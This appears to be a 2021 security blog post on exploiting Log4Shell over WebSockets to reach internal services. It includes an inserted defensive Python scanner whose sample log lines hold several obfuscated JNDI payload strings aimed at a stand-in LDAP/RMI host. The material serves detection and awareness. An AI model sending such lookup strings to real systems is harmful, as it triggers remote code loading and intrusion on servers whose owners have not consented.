Infiltrating Internal Networks with Log4Shell
Now that the year is in its last days, we can look back at the most significant disruption of 2021. We are only slowly beginning to grasp the scope of the events that followed the discovery of CVE-2021-44228, also known as ‘Log4Shell’, and its impact on the information security world.
While security teams worked around the clock to protect their servers from the vulnerability, they overlooked a more sophisticated Log4Shell attack vector, one that lets attackers reach into their victims’ internal environments.
Exploiting Log4Shell vulnerability via WebSockets
Since the discovery, many security researchers have dug deeper into this vulnerability and the ways it can be exploited. In a report by Blumira’s CTO, Matthew Warner, he showed that the vulnerability can be triggered over a WebSocket connection to machines that use Log4j libraries. This is critical because it enables attacks on local services. In simple words, attackers can use the vulnerability to reach devices that are not exposed to the internet.
“Until now, everybody looked for the Log4Shell vulnerability on external servers open to the world. Now, hackers can even attack internal machines that you didn’t think could be breached,” says Ysrael Gurt, Reflectiz CTO. “This vector significantly expands the attack surface and can impact services running over VPN or ones that are connected to the local network.”
Why WebSocket increases the attack surface
The real game-changer in the latest discovery is that the Log4j vulnerability can be exploited over WebSocket communication. This opens an entirely new attack vector that uses the digital supply chain and Java tooling to reach previously unreachable machines through a compromised server. Since a WebSocket request is initiated from the client side, every service reachable from the user’s machine can be targeted by the WebSocket request.
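As an added, defender-side illustration (not code from the original post, nor from Blumira or Reflectiz): a Python check that peels off the lookup nesting Log4j's `${...}` syntax allows and flags JNDI lookups in client-supplied strings such as WebSocket handshake fields. The log lines, the field names and the 198.51.100.7 address are constructed samples, not observed traffic.

```python
import re

# Innermost ${...} expression, i.e. one with no further "${" inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup once the wrapping lookups have been collapsed.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def _resolve(expr: str):
    # Emulate lookups commonly wrapped around "jndi"; None = leave untouched.
    var, has_default, default = expr.partition(":-")
    name, _, arg = var.partition(":")
    name = name.strip().lower()
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    if has_default:  # unknown lookup with a ${x:-default} fallback
        return default
    return None

def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Collapse innermost lookups repeatedly until nothing changes."""
    for _ in range(max_rounds):
        changed = False
        def sub(m):
            nonlocal changed
            out = _resolve(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out
        text = INNER.sub(sub, text)
        if not changed:
            break
    return text

def is_log4shell_probe(text: str) -> bool:
    return JNDI.search(normalize_lookups(text)) is not None

def scan_lines(lines):
    return [(n, normalize_lookups(line)) for n, line in enumerate(lines, 1) if is_log4shell_probe(line)]

# Constructed WebSocket handshake log lines; 198.51.100.7 is a documentation address.
SAMPLE_LINES = [
    'GET /ws HTTP/1.1 host=app.internal.example upgrade=websocket ua="Mozilla/5.0"',
    'GET /ws HTTP/1.1 host=app.internal.example ua="${jndi:ldap://198.51.100.7:1389/a}"',
    'GET /ws HTTP/1.1 sec-websocket-protocol="${${lower:J}${upper:n}di:rmi://198.51.100.7:1099/b}"',
    'GET /ws HTTP/1.1 origin="${${::-j}${::-n}${::-d}${::-i}:ldap://198.51.100.7:1389/c}"',
    'GET /ws HTTP/1.1 host=app.internal.example note="${date:yyyy-MM-dd} harmless lookup"',
]
```

Running `scan_lines(SAMPLE_LINES)` flags lines 2, 3 and 4 and leaves the clean line and the benign `${date:...}` lookup alone; the same check belongs on any string a client can feed into a logging call, not only on internet-facing servers.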
We already knew how dangerous the extensive use of Log4j libraries across various devices is. This discovery shows that threat actors can escalate the Log4Shell vulnerability into large-scale supply chain attacks.
The Log4Shell saga is an ongoing event, and we have yet to see the full scope of its impact. It reminds us that there is always a new vulnerability waiting to be exploited.